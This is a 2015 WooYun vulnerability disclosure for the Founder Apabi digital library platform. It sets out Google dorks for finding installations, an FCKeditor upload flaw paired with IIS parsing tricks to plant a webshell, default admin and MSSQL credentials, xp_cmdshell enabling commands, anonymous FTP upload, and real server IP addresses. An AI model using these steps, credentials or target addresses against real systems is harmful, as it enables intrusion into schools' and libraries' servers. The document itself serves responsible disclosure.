当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0121361

漏洞标题:方正阿帕比数字资源平台系统多处漏洞打包-可拖库-可getshell-可获取系统权限(通用 多案例)

相关厂商:北京方正阿帕比技术有限公司

漏洞作者: 路人甲

提交时间:2015-06-18 14:50

修复时间:2015-09-21 09:14

公开时间:2015-09-21 09:14

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-18: 细节已通知厂商并且等待厂商处理中
2015-06-23: 厂商已经确认,细节仅向厂商公开
2015-06-26: 细节向第三方安全合作伙伴开放
2015-08-17: 细节向核心白帽子及相关领域专家公开
2015-08-27: 细节向普通白帽子公开
2015-09-06: 细节向实习白帽子公开
2015-09-21: 细节向公众公开

简要描述:

乌云是目前最大的漏洞平台,只要你知道的系统、网站,它们的漏洞都可以从乌云上找到,所以乌云的漏洞库是一笔无形的巨大财富~

详细说明:

Apabi数字资源平台系统是一个用户量很大的图书馆系统
涉及网站太多为图书馆、学校等教育机构,甚至地方人社局等,而绝大部分服务器都不是单一的运行着这一套系统...真是个好“邻居”...

google 关键字构造
数字资源平台-用户登录
inurl:Usp/?cult=CN
inurl:Usp/apabi_usp/


2.png


4.png


在 /comm/admin/
存在FCKEDITOR编辑器 version 2.6.6 Build 25427

Comm/admin/fckeditor/editor/dialog/fck_about.html


5.png


...

0.jpg


FCKEDITOR上传漏洞.综合IIS6解析漏洞 轻松获取webshell
查看版本

/comm/admin/fckeditor/editor/dialog/fck_about.html


访问后建立shell.asp文件夹(iis6解析漏洞)

/comm/admin/FCKeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684


/comm/admin/FCKeditor/editor/filemanager/connectors/test.html#


<form id="frmUpload" action="http://site.com/comm/admin/fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=FileUpload&Type=File&CurrentFolder=/" method="post" enctype="multipart/form-data">
File Upload<br />
<input id="txtFileUpload" type="file" name="NewFile" />
<input type="submit" value="Upload" />
</form>


FCKEDITOR+IIS7.5解析漏洞文件名

a.asp.a;.a.asp.jpg..jpg


②:后台 /usp/admin/ 默认系统管理用户密码

admin  founder
superadmin founder


后台还支持查看用户信息及可导出

3.jpg


③: 默认安装mssql2005数据库 默认运行于系统账户 DBA账户密码

Data Source=(local);Initial Catalog=Usp_1;User ID=ApaUspUser;password=USPbsq93"/>


如果服务器对外开放1433端口,基本就沦陷了,或者利用上面fckeditor 漏洞拿下webshell 同样效果

Exec sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;


Exec master.dbo.xp_cmdshell 'whoami'


6.png


④系统默认是需要开启FTP的,可匿名访问..可上传下载、如果是处于外网...直接可以上传shell

默认下载目录是  /ApaDownLoadDlib  或者/ApaDownLoadDlib1,2,3,4


既然说是通用,这里给出几个案例

ftp://222.192.176.202/ApaDownLoadDlib/wooyun.txt
ftp://221.224.25.30/wooyun.txt
ftp://202.199.163.22//ApaDownLoadDlib/wooyun.txt
ftp://211.153.20.131//ApaDownLoadDlib/wooyun.txt
ftp://162.105.138.136/ApaDownLoadDlib/wooyun.txt

漏洞证明:

漏洞证明在上面详细说明里已足够、拿下webshell后在99.9%均可获取到系统权限,进入远程桌面任意操作。这里就不证明了,并无深入!

b.png


a.png


11.png


111.png


12.png


122.png


13.png


133.png


144.png


15.png


155.png

修复方案:

打怪升级..

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2015-06-23 09:12

厂商回复:

CNVD确认并复现所述情况,目前暂未建立直接处置渠道,由于涉及用户案例较多,CNVD正尝试通过公开联系渠道通报.

最新状态:

暂无